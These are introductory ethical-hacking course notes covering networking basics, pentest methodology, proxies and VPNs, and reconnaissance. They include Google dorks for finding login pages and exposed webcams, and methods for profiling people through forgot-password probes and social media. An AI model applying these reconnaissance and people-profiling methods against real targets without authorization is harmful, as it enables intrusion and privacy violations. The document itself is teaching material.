Web Based Ethical Hacking

Introduction to information security and basics of computer

1.Introduction to information security

As we all know, in the world of hacking, nothing is fully secure.

A hacker tries multiple ways to enter a system and finds possible entry points which would let him enter the system.

Loopholes are small problems which can be exploited to cause bigger problems. (or a part of a system which is not properly defined or secured and hence can be exploited to cause unintended things in the system.)

And hacking is the art or technique of finding and exploiting security loopholes in a system.

Types of hacking:

Based on the intention of the hacker, hacking can be divided into 2 parts:

Unethical hacking: this is when a hacker uses his knowledge to steal or cause damage to other people. It is illegal and one can go to jail for it.
Ethical hacking: when a hacker helps organisations or individuals with finding security loopholes and fixing them with their permission, it's referred to as ethical hacking. It's perfectly legal.

According to the Indian Cyber Laws and the Indian IT act classifies cyber crimes into 2 broad categories. An activity is considered a cyber crime if:

1. A computer is being used to attack other computers. For example: hacking, virus/worm attacks, DOS attacks, etc.

2. A computer is being used as a weapon to commit real world crimes. For example: cyber terrorism, IPR violations, credit card frauds, EFT frauds, pornography, etc.

This basically means that unlawful use of any computer/device is considered a Cyber Crime.

Types of hackers:

White hat hackers:

Good guys
Help people with their security.

Black hat hackers:

Bad guys
Hack and steal information for professional gains.

Grey hats:

Part white and part black hats.
Practise both ethical and unethical hacking.

2. Hacking Methodologies and Security Auditing

Steps followed by black hat hackers:

Information gathering and reconnaissance: hacker tries to gather as much info as possible about the target. Eg: server (apache), backend (PHP 7.0), user base (shopper, sellers, admins, etc), architecture (lamp) etc. also maps basic working of various features on the website (this is an extremely important phase as our success depends on it).
Vulnerability assessment (VA): Hacker uses manual techniques to gather info, steal data and gain access.
Penetration testing and gaining access: exploits vulnerabilities to gather info, steal data and gain access.
Escalating privileges and maintaining access: after getting access to users accounts, hacker will try gaining access to the admin’s accounts and install backdoors on it so that even if the passwords are changed and security gets stronger, the hacker will still have access to the system as long as the backdoors are installed on the system. This is done to maintain access and for further exploitation.
Clear tracks: deletes all server lockfiles, removes any additionally added software, deletes all extra users that were created, deletes backdoors and reverts the server to how it was before.

Steps followed by white hat hackers to secure a web application:

Legal documentation: signing a memorandum of understanding (MOU)and describing the testing activity and steps to be taken on a legal paper. A non- disclosure agreement (NDA) tells that things like cost, vulnerabilities, and details of the server etc will not be disclosed by both parties. Financial agreement is also signed putting the cost on a legal paper.
Scope assessment: deciding what parts of the web application will be tested and the time required to do so.
Info assessment: client provides some info regarding the system and the security expert then analyses it. (info like some accounts, details of the servers, backend language, arch of websites etc.)
Vulnerability assessment: finds all possible vulnerabilities and documents. Then, just like black hat hackers, use automated tools to find vulnerabilities and then document them and test them manually.
Penetration testing: Try to exploit all possible vulnerabilities & document the results (just like a black hat hacker but motive is diff.) Security expert then documents the exploitability of vulnerabilities & lists them in a proof of concept. (POC) (proves that a vulnerability exists)
Gaining access: now use vulnerabilities to gain access to internal assets, servers and data.
Privilege escalation: try gaining access to the admin account.
Report generations: descriptive & well formulated report is formed of the entire exercise (contains: explanations of impact of vulnerabilities found).
Patch assistance: company decides which vulnerabilities are to be fixed/ patched (depends on the risk involved & the cost/ effort required) developer patches & the security expert assists them.
Revalidation: We check if vulnerability has been patched or not..

Security testing/ penetration testing (Don't confuse this with white and black hat hacking) White box testing: When a security expert gets complete assistance from the organisation (e.g. information like architecture, source code, Demo accounts, server details etc). Basically we get complete access to the clients website. Aim is to make sure that no loophole is left. Black box testing: When security expert gets no assistance Expert. has as much info as any malicious hacker would have. Goal is to understand how a malicious hacker can harm the website without any assistance from the organisation.

Grey box testing: (Mix of white & black) when security export gets partial assistance. Here organisation gives some partial details like demo aces & server details but may not give other crucial info like source codes admin access etc. Aim is to see how a hacker who has some basic knowledge can harm the website.

Most Organisations prefer grey bestesting because:

lesser effort is required to provide information to the security expert.
Tells how a hacker with minimal knowledge can harm the website.

based on the location of the security expert, testing can be:

Internal testing: When a security expert, tests the application from the Premises of the organisation. Here the server's, application & other assets of the organisation are present in an internal & private network and so the security expert can directly connect & access them. This is Usually be done when the organisation wants to test the internal applications & office networks that are part of the internal network.

External testing: When security expert tests the application from outside. The premises of the organisation. Here servers, applications etc are connected to the internet & experts can also connect to the internet access from wherever. Most companies prefer this as they are free from travel, accommodation etc.

Computer Network

→Why learn computer networking? When we try to open a website, diff types of computer devices interact with each other to give content. of the website. To secure a website, it is important to know how these comp. devices interact with each other.

→What is comp. network? Two or more devices connected to each form a computer network.

→Motive of connection can be: File sharing, resource sharing (stuff like printer etc) or communication etc.

→What devices can be connected in a comp. Network?

common devices like: laptop, phone, printer or any other device that has a builtin tech to connect to other devices (wifi or bluetooth)
Networking devices like routers, switches & firewalls. They help in making connections smooth & secure.

all devices in a network are called nodes.

Type of comp. Networks

on the basis of geo. coverage:

LAN	MAN	WAN
Local area network	Metropolitan area network	Wide area network

On the basis of accessibility:

→Internal network: eg: devices connected to 1 router like in one home: phone, tablet & printer these devices form a network can only be accessed from inside this network which is guarded by the router.

→External network: eg: connecting to google using the internet which is an external network and can be accessed by anybody. So when resources / device's need to be consigned publically, they are configured on an external network eg: chatting over facebook using the internet.

Internal network helps keep data & resurges isolated from public access.

Client server models & data packets

text, images, video etc → data of the website.

For us to be able to see this data, it needs to be stored in a device which has to be connected to the internet at all times. These devices are called servers. Data is stored in the server assigned to that particular website & it sends data when asked for.

Client server model (used in web Dev. industry a lot.)

When we open a website, the image loads slowly (in parts). This happens because, when we request for some data (e.g. image). The server breaks data down into small chunks called data packets. And then sends them across. This is done to make comm. more efficient.

All data travels in small chunks called data packets.

What is an IP address?

How does our device find the server of the website?

all devices in a network interact using IP addresses.

→ each and every device connected to the internet has an IP address. (e.g. laptop, phone, servers etc)

→ when we search google.com, the IP address of google.com server automatically gets dialled. This makes our lives easier.

→ our device gets an ip address every time it connects to the internet. But once we disconnect & connect back again either our ip address can stay reserved (static IP address) or it gets freed up & we are assigned a diff. IP address, (dynamic IP address)

IP address versions:

IPv4 - IP version 4 address eg: 198.162.1.1. pattern followed: A.B.C.D.

A, B, C,D can be an integer between 0-255.

only 4.2 billion IPv4 addresses are possible.

To tackle this Prob. IPv6 was created.

IPv6- IP version 6. pattern followed → A:B:C:D:E:F:G:H

each A,B…..H has 4 hexadecimal digits i.e 0-9, a-f and A-F

Since, IPv6 is new technology, old devices still use IPv4 (not compatible with 6)

Another solution to IPV4 addressing limited number:

NAT (Network address translation)

Internal IP address:

So, computer 4 can't connect directly with computer 4’ cause they will not know the internal IP address of comp 4. Only the router will know the internal IP of devices connected to it. So, comp 4 will have to go to router 1 first which will connect to router 2 & that will go to computer 4’. So, we can say 4.2 billion 18 addresses can be reserved for external IP addresses. Since only those are visible to the public. & internal IPs can be repeated.

IP Address Range: Now that we know about IP addresses, we must know that some IP address ranges are reserved for special usages. Here is a list:

For small internal networks (Like your home or small office): 192.168.0.0 to 192.168.255 255

For large internal networks (Like large MNCs, colleges, schools): 172.16.0.0 to 172.31.255.255

For massive internal networks (Like telecom networks, satellites): 10.0.0.0 to 10.255.255.255

127.0.0.1: This is called the LoopBack address and is used as the address of your own machine.

What is a Domain Name?

A domain name is a humanly understandable name of any web application hosted on one or more servers, & it helps us connect to them.

We use these names because they are easy to remember.devices use IP addresses to connect to other devices.

When we type domain names in the address bar, the system correspondingly converts them into IP addresses. It can do so in 2 ways:

system can maintain a list of frequently visited web sites & their IP addresses.

This cannot be done for all the websites because it will take up too much memory and IP addresses are mostly dynamic (keep changing) and hence a list cannot be maintained.

When we type the Domain name of any website, the system calls the Domain name system or DNS to help us locate the IP address of that domain name.

What is DNS?

A DNS or Domain name system is a system of devices that helps us find the corresponding IP address of a domain name. The DNS consists of many servers which do the job of finding IP addresses for the domain names.

Why is the DNS made up of a series of servers & not just one single server?

One server alone cannot store such massive information about so many domains.
One server alone cannot handle millions of incoming requests per second.

Working of a domain name system

eg: drive.google.com.

In this example, each of these parts has a separate name for it. Information of each part is stored in a different server or component of the DNS.

A domain name is always read backwards.

last dot (.) → root name → stored in root name server

That part of the domain name is not written by us but gets added.

.com → Top level domain (TLD) → TLD server

Sometimes there may be a second level domain. Eg: .co.in

·co-> second level domain -> SLD server

.google → Authoritative name → Authoritative name server

name we actually buy from a domain name provider.

drive → subdomain/ host.

→ host because it is the actual page being requested by us.

→ sub domain because it is part of the authoritative name.

→ client only buys the authoritative name of the domain. Sub domains can be created by the owner for free.

→ Therefore, It is part of an authoritative name, an authoritative name server only stores info about its sub domains.

Cash memory: temporary memory that all devices have so they can store information temporarily. Our browsers/ operating systems/ all servers in the DNS store some domain names and their IP addresses in cash. These are the most frequently requested addresses. .….……
Cash memory makes the process faster.

Ports

when we are using multiple websites at the same time our device is connected to different servers & receiving data from them. Now, to avoid confusion, which data is from which server or from POV of server, which request is from which device. All devices have ports (both clients & servers).

Hardware ports	Software ports
USB port, Audio port, HDMI gateways to get inside the system and interact with hardware.	provide a port gateway to get inside the system & interact with the software.

Reserved ports:

Port 80 → HTTP service

Port 443 → HTTPS service

Port 21 → FTP service

Port 23 → Telnet service

Port 25 → SMTP service

When a data packet is travelling from device to server (or vice versa), this packet contains 4 pieces of information:

IP address & port no. of server (to deliver) and

IP address & port no. of the client (to send response)

eg: 198.234.20.1:80 such combination of IP address and port no. is called Virtual Socket. Friends can connect to play counter strike on one port.

Many services can run on a server.

Service: listening on different ports of a server, capturing requests of clients & responding to it. Each service has a different port.

Reserved port range:

Port 0-1023: reserved for basic well known to reserved services.

Port 1024-49151: reserved for some registered services. (eg counter strike)

Port 49152-65535: range of temporary ports. (used by clients)

Port on the sending device is called local port & port on the receiving device is called remote port. These are relative terms.

To check open ports:

To check for open ports on a windows machine:

1. Go to the start menu and type cmd.

2. Right click on the command prompt and click on the ‘run as administrator’ option. 3. Type netstat -a | find /i "listening"

You will see a list of all ports that are listening for a request.

To check for open ports on a Mac OS:

1. Open the terminal and run the following command.

2. netstat -an | grep LISTEN

To check for open ports on a Linux machine:

1. Open the terminal and run the following command.

2. netstat -lpnt

Question: Run the netstat command and see what ports are running on your system. Use Google and find out what these ports are used for and then deduce why your system is waiting for a connection on each of these ports.

Tip: On Windows, Run cmd as administrator and inside it, “netstat -aon”.

Here is a sample output:

As you can see we have 5 columns.

Proto: This is the base protocol being used (TCP/UDP)

Local address: This is the IP address and Port number (separated by a colon) of your computer being used to communicate.

Now you can see that in the screenshot, we have various IP addresses: 0.0.0.0 , 10.0.75.1 , 127.0.0.1

This IP address tells you which network this entry is for. For example, if you are connected via LAN cable and get the IP 192.168.12.123, then all communications via the LAN cable will have this IP. Parallelly, if you also have WiFi connected with the IP address 10.0.0.145 then for WiFi connections, this IP will be shown.

Also, 0.0.0.0 simply means all interfaces, be it Local, LAN, WiFi etc. And 127.0.0.1 means communication is happening locally within your own computer between different applications.

Foreign Address: This is the address of the device your system is communicating with. So let’s say you visit Google.com on port 443 and Google’s IP address is 1.2.3.4 then in the foreign address, you will see 1.2.3.4:443 and in the local address, you will see the IP address of the network interface being used to connect to Google (Like your LAN IP or your WiFi IP etc)

State: This is a very important column as it tells you the state of the connection. In the above screenshot, you can see ‘Listening’, which means your system is waiting for a connection on the given port. Similarly, ‘Established’ means a connection has already been made and communication is probably happening.

PID: This is the process ID of the software handling the communication. You can use the ‘tasklist’ command to see all running programs and their respective process ID.

Now let us break down the 1st entry in the output

Problem Statement	Local Address	Foreign Address	State	PID
TCP	0.0.0.0:135	0.0.0.0:0	LISTENING	1080

Here the Protocol is TCP. As the state is listening, and the local address is 0.0.0.0:135 it means that our computer is waiting for connections on port 135 and 0.0.0.0 means from anywhere, so anyone in your network whether WiFi, LAN or from your own computer, can connect to your IP on port 135.

In listening, the foreign address doesn't matter too much.

The PID here is 1080.

Below is the output of the tasklist command showing what exactly is 1080.

So this means that svchost.exe is listening on port 135 for incoming connections from anywhere (0.0.0.0)

Now your task was to find open ports on your computer which are waiting for connections i.e.state is Listening.

From the 1st screenshot, we can see that our system is listening for connections on the following ports:

135, 445, 903, 913, 1536, 1537 and many more (you might have more or less ports)

You can search about these ports on Google to see what they are used for and why your system is waiting for the connection.

For example, the port 135 is used by an internal Windows Service responsible for your system to communicate with other Windows machines in the network for file sharing, authentication, etc.

Same is for 445.

Protocols:

Looking at Common Protocols: Nodes follow different protocols for different functions. Here is a list of some common protocols.

HTTP: HTTP stands for HyperText Transfer Protocol and it is used to transfer hypertext, which means web pages.

HTTPS: This is the secure version of HTTP, where s stands for secured and is used to transfer web pages in a secured way. Most websites that we visit, like internshala, amazon, google, etc., use HTTPS and not HTTP. The fact that it is secured means that all communications between your browser and the website you are connected to, will be encrypted. You can see this in the address bar located at the top of the browser.

FTP: FTP stands for File Transfer Protocol and is used while transferring files.

SMTP: SMTP stands for Simple Mail Transfer Protocol and as the name suggests, it is used to send emails from one device to another. But when you open gmail, or compose and send an email, does your address bar show SMTP, or HTTPS. Well, try it and find out for yourself, and look out for the reason somewhere in this topic.

Telnet: This protocol is used to remotely run system commands on the server.

SSH: SSH is Secure Shell and is like a secure or encrypted version of Telnet.

VOIP: This stands for Voice Over Internet Protocol and is used for making a voice call over the internet. So while you are making calls over whatsapp or skype, VOIP is being used for this communication.

What are protocols?

set of rules & regulations that devices follow to transfer & receive data over wired/ non wired medium.

Understanding TCP/IP model

transfering of data from one node to another has multiple steps involved:

All this work is done in a particular order & there are different layers to take care of each tack.

These layers make up the TCP/IP machine model.

→ This model has 4 layers & there are different protocols & rules for carrying out work in each layer. All layers deal with different aspects of data transfer.

4. Application layer: converts data into binary.

→ It encodes, compresses & encrypts data.

→ Also establishes sessions. (initiates sessions)

What are sessions?

↳ A session involves signalling to setup & manage comm. b/w 2 devices.

→ Used to establish a comm b/w 2 devices.

→ info. signals sent from node A to node B. (like hello, bye etc).

→ It lets node B know that node A wants to communicate with it. Once node B confirms that it is ready to communicate, the actual communication starts. Similarly, a termination signal is sent & the other device acknowledges. (Termination of the session)

Our browser Acts as an application layer. Protocols: HTTP, FTP, Telnet etc.

3. Transport layer

→ port no.s are added to the data packet.

Thus, an application to application connectivity is formed.

protocols: TCP, UDP

2. Network Layer

→ adds sender's & receiver's address to data pocket.

→IP address provides the logical path that needs to be taken by a data packet to reach the destination device.

→This layer handles IP addressing, routing & virtual pathing.

→It adds MAC addresses of the client & the server.

Protocols: DHCP (for assigning IP addresses), ARP(for conversion b/w IP and MAC addresses), & ICMP (for debugging network stability & deliverability).

1. Physical layer:

→ convert binary signal to electrical signal for data transfer, so they can be Physical Layer converts binary signals to electrical signals for data trandin So they can be transported through physical cables and optic fibres.

→ comprises hardware used for data transfer.

→ checks itself for errors & controls the flow of data. eg: Wifi adapter.

protocols: Ethernet(for LAN cable), 802.11(wireless connections like wifi, bluetooth etc.), DSL (for telephone cables).

When a packet is received, the same process is followed in reverse order.
UDP, TCP, FTP, SSH, HTTPS, TELNET, DHCP, IP }- all these are part of a stack of protocols, called TCP/IP stack.
2 main layers in this model→ Transport layer & network layer.

Protocols on these layers, give name to this model.

Understanding TCP/UDP protocols (Transport layer):

These protocols deal with 2 diff ways in which data packets are transferred.

TCP→ transmission control protocol.

UDP→ User datagram protocol.

Sender will wait for Joe. x then retransmit. If not confirmation for some time.

TCP	UDP
Connection oriented: 2 devices first establish a connection & then send the data packets via this connection.	Not connection oriented: 2 devices do not establish a connection and start sending data packets directly.

Understanding DHCP/IP protocols (Network Layer)

DHCP

→ Dynamic host configuration Protocol.

→responsible for allocating IP addresses to devices.

→Internet protocol.

→Responsible for routing of packets.

OSI Model

So, we have seen the TCP/IP Model. Actually this was a derived model and is used today. But the original model on which the TCP/IP model was based, is called the OSI Model. This model has 7 layers, instead of 4 that we see in the TCP/IP model. The essential overall function of both the models remains the same, just that in the OSI model their work has been split into 7 layers.

Now let us look at the function of each layer of the OSI model in detail.

So, just like in the TCP/IP model, the data in the OSI model also passes from layer 7 to layer 1 at the sender’s end and from layer 1 to layer 7 at the receiver’s end.

Application Layer- This layer provides an interactive interface for the user to enter and view data. One can give inputs in the form of text, audio, images, files, etc. The browser makes up the application layer.

Presentation Layer- After the application layer, the data passes to the presentation layer. This is where the data is converted into computer friendly format, i.e in binary code. So, the presentation layer encodes the input, compresses it, and encrypts it if required. Then the data is sent to the next layer.

Session Layer- This layer initiates a connection and creates a session, so that some context can be provided to the communication between the two devices.

Transport Layer- This layer establishes an application level connectivity. For this, it attaches the source and destination port numbers.

It also performs the task of error control, which means that it makes a checklist, so that it can be cross checked at the receiving end to ensure that all the data is transferred properly and not destroyed on the way. These checklists are known as checksums.

Network Layer- At the network layer, the source and destination IP addresses are attached, for the purpose of identification of devices, and to decide the virtual path that needs to be taken by the data packet. So, we can say that this layer does network level routing and pathing of packets.

Data Link Layer- This layer attaches the source and destination MAC addresses, which are used to identify the hardware of the device. It also calculates checksums for error checking of the metadata that has been attached at all the previous layers, and also to manage the flow of data.

Physical Layer- This is where the data is converted to hardware friendly signals, like radio signals, light signals, or electric signals, depending on the hardware that is being used for data transfer.

This is the order in which the data passes at the sender’s end. At the receiver’s end, the order of the layers is reversed.

Now, don’t worry if you cannot remember all this information. We have some simple tricks for you. A simple mnemonic that can used to remember the order of the layers from layer 7 to layer 1 is:

All People Seem To Need Data Processing

So that was all about the OSI model.

Proxy

Proxy server provides anonymity to both sender & receiver.

Proxy hides IP addresses of both server & client. Our browser history won’t show which device we connected to and it will only show connecting to proxy. The websites won’t be able to see our IP address either. It will only see the IP of the proxy.

Disadvantages of proxy:

proxy servers can keep a record of the logs, & conversations between our device & the websites we are visiting.

Uses of proxy servers:

→ To hide IP addresses.

→ By network administration to ban certain websites.

colleges can monitor all the traffic their wifi and hence choose to drop all requests of certain websites.

→ By developers for troubleshooting.

When a new app/website it's requests & responses are recorded by proxy. And this helps in troubleshooting.

→Reducing traffic on the server.

Proxy server saves frequently visited websites in its cash memory. Hence saving time.

Uses of proxy servers:

General users:

1. Obscure their IP

2. Avoid surveillance

3. Bypass browsing restrictions

4. Access resources as from a different country

Developers:

1. Monitoring web traffic

2. Troubleshooting web applications

Network administrators:

1. To block malicious traffic

2. To balance overflowing traffic

Using proxy to change IP address:

3 ways in which proxy can be used:

Sending traffic of one tab in the browser through proxy:

1st install a proxy (free or little cost). Proxies that are used to divert the traffic of the tab / or for sending all browser traffic through a proxy are called one line or web proxies.

Advantages:

→ No setup required / easy to use.

→ no browser history.

→ options to change countries on the fly.

Disadvantages:

→ lots of advertisements (for free ones).

→ Untrusted & can be unsafe.

→They keep complete logs.

→Slow speed.

→ Not suitable for all web activity.

→ Proxy has to be implemented on each tab (for tab base proxy).

To implement: search ‘free web proxies’ on google.

Sending all browser traffic through a proxy:

Advantages:

→ no need to set up a proxy on every tab.

→ can pick servers by anonymity.

Disadvantages:

→ slightly hard to set up.

→ IPs need to be changed frequently as a lot of them stop working.

→ slow speed.

→ No guarantee of anonymity.

→ Only works with standard browsers on the PC.

To implement: search ‘public proxy server list’ on google.

Browser Plugin based proxies.

These are available in free / paid versions & can be downloaded in the browser & used. They provide the option of switching from 1 IP address to another for better anonymity, eg: Foxy proxy and anonymox.

Disadvantages of proxies:

→ No guarantee of security & anonymity.

→ Proxies keep log of all requests.

→ No encryption is provided in a lot of cases.

→ can only be used for web browsers on PC.

→ slow speed.

VPN: Virtual Private Network.

How are VPNs better than proxies?

→ Fast

→ Secure & encrypt all data.

→Do not save logs.

→ Guarantee anonymity.

→ can be set up for all applications on various devices, like laptop, mobile etc.

working of a VPN:

Creates a virtual tunnel between client & server, and all conversation is encrypted.

Therefore, While using VPN, we are part of a private & secure network.

Advantages of using a VPN:

→ Mostly used by large scale businesses to allow faraway employees to access the internal network in a secure way.

→To hide one's IP add. from hackers, shoppers, govt., ISPs etc..

→ To bypass browsing restrictions placed by colleges, schools, offices etc.

→ To avoid a region wide block of some IP addresses.

The 1st step white hat hackers perform after legal paperwork is the information gathering & reconnaissance.

What is information gathering?

Gathering as much info about the target as possible & organising it in a structured manner so that it can be utilised later in the vulnerability assessment & penetration testing phase.

What is Reconnaissance?

It is the process of analysing all this info gathered & utilising it to understand the target.

Who is the target?

target will be the web application that needs to be tested.

Depending black/grey/white box testing, information provided by. the organisation will vary.

What kind of information?

The info that we gather are called the digital footprints.

Digital footprints are the traces left online while a person is using the Internet. These traces can be used to trace a person, organisation or web application.

eg IP address left at some point, likes on insta, chats on facebook or preferences & add in online shopping.

Information gathering:

Some common pieces of info expert tries to gather:

Critical assets or web applications that belong to the client.
Related domains & sub domains.
Server architecture of the applications running on these domains.
Registration details of each domain.
Other web applications running on the same server as the target domains.
critical cached pages.
older snapshots of the web application.

In this, 1 and 4 are directly related to target

And 2 and 3 are related to the registration details of the domain where the target application was hosted.

Registration details include: name of the owner, name of the developer, Date of Hosting, date of Expiry.

Why do we need this info.? It will not help us find vulnerabilities. But, this comes under the area of social hocking. Here's how it's relevant.

Let's say google hires an expert to conduct black to box testing. He is given no info & not even the application he needs to test.

He starts by finding: CEO's name, his Fb & details, organisation's address, domain registration details, Developer's name etc. (Say Mr.X.)

Expert will now find more about Mr. X, like his history, where all he has worked in the past, how active is he on social media etc. Aim is that if he compromises X, he can get complete access to google.com without having to find bugs.

Once an expert gets backend access, he can test easily. But why do we need to do such unethical things? But these things are not unethical as we are hired to do all this.

Why conduct a black box exercise?

→ To get a black hat hacker’s perspective without internal assistance.

→ To test the preparedness of the organisation's internal security team.

Most common types of info services that aid in information gathering:

WhoIs information:

Whols is a protocol that queries & receives responses from the database that stores the registration information of a domain or an IP address.

provides info about ‘who is' behind the domain for eg, stuff like:

→ Name of organisation

→ owner of domain

→ Developer (who handles domain) etc

And about them, stuff like full name, contact complete add, & e-mail address and fax number. All this info is public. & this is the information we get from WhoIs lookup. This info is the starting point to find other information.

Reverse IP lookup:

Sometimes multiple websites are hosted on one server. They may or may not be from the same organisation. When they are from different organisations, it is called shared hosting.

What is reverse IP Lookup? It looks up the IP address & gives a list of all the domains running on the same server.

Gives list of domains that have the same IP address.

Let's say that website A & B are on the same server.( got to know this from reverse IP lookup.) A is the target application but it is very difficult to find bugs in it. But B has bugs that are easy to exploit. By these bugs, we can get hold of the server & hence of website A.

Gathering information about people & Organizations. (Whols Lookup):

Here is how we find this info:

Full name: social media(facebook, instagram etc) and professional platformes (linked In, naukri.com etc.)
E-mails:

→ forgot password on email ( directly on gmail etc)

→ forgot password on services linked to an email (try logging on amazon, ola, facebook etc using that email.)

→ google search: write email address in “_” and search on google. Result will show everywhere where that email has been used publically. E.g. job posting or public query.

Mobile no.:

→ login & forgot password pages (just like email.)

→ google search (write mobile no. in "_")

Finding information about organisations:

Social media platform: activities of company, ex employees etc.
company review services: working environment, fee structure etc.
Organisation financial Analysis services:

→crunchbase, wikipedia, angel list etc.

→information about the financial situation of the organisation & key people associated.

Here are some key pieces of information that a security expert usually gathers about a website:

1. Related domains and subdomains

2. Technology and programming languages being used

3. Cached pages

4. Website history

5. Publically indexed files on search engines

6. Default pages and login forms

7. Related IP addresses

8. Other services running on those IP addresses

9. Version of the services/softwares being used

10. Publicly disclosed vulnerabilities in the softwares being used

11. Default users

12. Default passwords

13. Valid email address and usernames

Gathering information about websites & Web servers:

Getting an idea about the technology being used by a website & web server.

ways of finding this out:

→ Look at the HTTP requests & responses of a website.

→ Look at the HTML code, that is the page source of a website.

→ use web sites like builtwith.com to see framework (to see coding language), see web Hosting provider (to see where it is hosted) & web server (to see server being used).

This web site also has an extension to see while we’re browsing. (builtwith.com).

looking at the history of a website. (web archives)

We are trying to see how the website looked, a few years ago & how it has changed over time. What information has been added/deleted etc.

→ Use websites like web.archive.org (scans & takes screenshots of websites from time to time) ( you can go to the year you want to see.)

Finding related sub domains of a given domain (eg drive for google)

It is possible there are assets placed in sub domains & these assets are weakly configured & hence can be exploited.

How to find a subdomain?

→ make a guess

→ Go through the server DNS files.

→ google search. (use websites like dnsdumpster.com) (see host records A section to see all the subdomains that a website has.)

‘Crunchbase’ website → useful for looking at the financial & funding records of an organisation
'Glass door’ → is for company review.

Understanding search engines & Dorks

The search engine goes to the 1st web page of every website & then visits other web pages linked to that page. While doing this, it collects all the data that it finds, the process continues for the entire website. This process is known as crawling. It's an ongoing process. Since, websites keep updating their data & adding new web pages. & it is done for all the webpages that are stored on the internet.

The search engine adds all this information in a special database called the search index & retrieves the info from there.

Dorks: specified keywords we can use to do a more accurate search on google. E.g. site:internshala.com.

Dorks are special search filters that can be applied to a search engine, to make the search targeted and specific.

Some of the most commonly used google dorks are:

site: <Domain> This is the most common dork, and it filters out web pages from a single website. Eg: “site:internshala.com” lists out all the web pages on internshala. It can also be used to search for web pages within a specific sub domain, or even for an entire TLD. So you can search for “site:training.internshala.com” to search for a specific sub domain or for “site:in'' to search for all the web pages with the top level domain (TLD) '' .in" in them.
inurl: <Text to find> This keyword can be used to find URLs with specific text in them. So if you search for “inurl: login.html” it will give a list of all URLs where the text login.html is present.
intitle: <Title text> This dork can be used to search for web pages which have some specific keyword in the web page title. For example, “intitle: admin login” gives a list of several admin panels.
intext : <Text> This dork can be used to search for specific keywords in the body of the web page. So if you type “intext: webcam login” it returns a lot of interesting results, some of which look like login pages of live webcams across the globe. Some have weak passwords, or no passwords at all, which makes them vulnerable to attack.
filetype: <Type> This is the most useful dork, and can be used to filter out web pages which have a particular type. This dork can be used to search for documents (pdf), spreadsheets (xls), webpages (html), server pages (php), executables (exe), presentations (ppt) and much more. A lot of students use it to quickly find pdfs related to the assignments that they are supposed to make. For example, if you do a search for “Revolt of 1857 filetype: pdf” you get a result of all pdfs on the topic.
ext: <File extension> This is similar to the “filetype: <Type>” dork, and can be used to search for specific or uncommon file extensions. Eg: “ext: config” returns a list of all configurations which have the name “filename.config”
“Exact word” We have already learnt how to use this dork in the previous topic. When we search for a keyword without putting double quotes, the result includes pages which have the exact word, or synonyms, or other related material. But, when we do a search using double quotation marks, the search is more specific, and returns only those web pages which actually contain the keyword as it is.
Negative search - (minus) This search is used to eliminate certain types from the main search. For example, you want to find out platforms that have the beginners guide to C++. But, you want a free version of the book, and not a paid one. So you can simply search for “Beginner's guide to C++ -buy -order -purchase -pay” to get results of free books.
“Keyword 1” | “Keyword 2” This search can be used to put an OR between keywords, which are in double quotes. Eg: “admin login” | “administrator login”

These are powerful when combined (as they help us filter out information) e.g. site:internshala.com intext: login intext: password.

There is a mine of dorks, containing thousands of dorks and this mine is called GHDB (google hacking database).
A website is a collection of web pages that can be interpreted by a browser.

Basics of web architecture

→ A web page is an HTML document that makes up the front end part of the website.

→ All the pages that we see while browsing through a website are its web pages.

What is HTML? It stands for Hypertext markup language. It is used to build the front end part of a website, i.e. the look & feel of the website. This long is used to describe how the browser is supposed to display a document.

front end: front end part of a user, run on a client side, i.e on the browser of the user. So whatever we see on screen is the front end part of it. (front end is usually written using HTML).

backend: part where logic of the website is written & executed. This part is responsible for making the website dynamic & functional. It can perform logical actions like doing calculations, fetching data at the user's request, storing data in the database is an effective & secure way and so on. This logic depends on the functionality of the website.

Terms related to architecture of a website: website, web pages, HTML front end, back end.

Web servers: Web servers can be of various types. Each one has a specific function, and hence a specific configuration. Let us read about some of the most common web servers.

Application Server: This server executes the main business logic of the application. Whenever the user requests for something, the application server runs the code written by the developer.

Database Server:A database server is a system where all the data is stored. Whenever the user requests for some data, it is fetched from the database server. The data is stored here in an efficient and secure manner.

Backup Server: This server helps us create backups for files, data, etc. This is done to prevent the loss of data in case of an unexpected failure. A backup server can also act like the secondary server, in case the primary server is down.

DNS Server: The Domain Name Server manages the domain names and their IP addresses. The main function of a DNS server is to map a domain name to its respective IP address.

Mail Server: A mail server is used for sending and receiving emails. Some of the protocols used for this transfer are SMTP, POP, IMAP, etc. The Microsoft Exchange Server is an example of a mail server.

Depending on the size of the web application, all these servers can be present on one physical server or on separate servers.

Common Security Misconceptions:

If a website uses HTTPS, it is secure.

In HTTP → data is not secure as it is not encrypted & hence it is transferred as plain text (anyone can look at it & understand)

In HTTPS → data is encrypted. If a hacker sees the data, He cannot understand what is written in until he decrypts it (decodes it). It is possible that the logic used is too weak. (kinda like the logical reasoning questions we solve) Hackers can crack the code.

Therefore, if a website uses HTTPS, it can still be hacked using other techniques.

If a website has a firewall /IDS/IPS, it cannot be hacked.

→Firewall: A firewall is a network security system that monitors & controls incoming & outgoing network packets. It prevents unauthorised requests from reaching the server.

→ IDS (intrusion detection system): This system detects any intrusion or malicious activity inside the net work, & tells the admin about it.

→ IPS (intrusion prevention system): It prevents the malicious agent from causing any harm inside the system.

How do these work? Firewall, IDS & IPS have a list of agents & signatures that are malicious and that need to be blocked. It is just like the criminal records kept by the police.

They read all the incoming data packets & if they find any malicious signature in any data packet, They block it right away.

But what if they get a request from a new signature, which is not a part of this blocklist? A skilled hacker can try and bypass these checks that the IDS and IPS put in. In that case, they can't block it & hence, even if the website has these security systems in place, it is possible to bypass them & hence, the website is not fully secure.

Therefore, if a website has a firewall, IDS or IPS, it is possible to bypass the security measures.

Hiding a file/folder/domain is the same as protecting them.

Hackers can get access to critical files. by brute forcing, guessing or simply by doing a google search using google docs. Hence, one can find it, even after it is Hidden inside so many layers/folders. & It is important to put strong passwords and security checks on domains & sub domains that are not advertised to the public.

Therefore, Even if the files/folders / domains are hidden, it is important to put strong security checks on them.

Now, let’s look at these 5 servers we had read about in the previous chapter. So, like we said, it is not necessary to have these as 5 different servers, but a combination of these can be present in one physical server, depending on the requirement of the application.

Now, this server will have some architecture which should be appropriate for the kind of functions that the server will perform. This architecture is called a web server architecture. It is made up of these 5 basic elements. Let’s look at each one of these.

Server OS- Just like every computer has an operating system, similarly the computer that hosts the website also needs to have an OS. Examples are Linux, Windows, IBM AIX, etc.

Server Software- We know that every website needs to address the incoming requests of the users. This request could be for a web page in the website, or for any other functionality that the website provides. For this, the server needs to run the code of the website to generate a response for the user. But, to handle all this function, the server needs a software which is called the server software. Examples are Apache, nginx, IIS, etc.

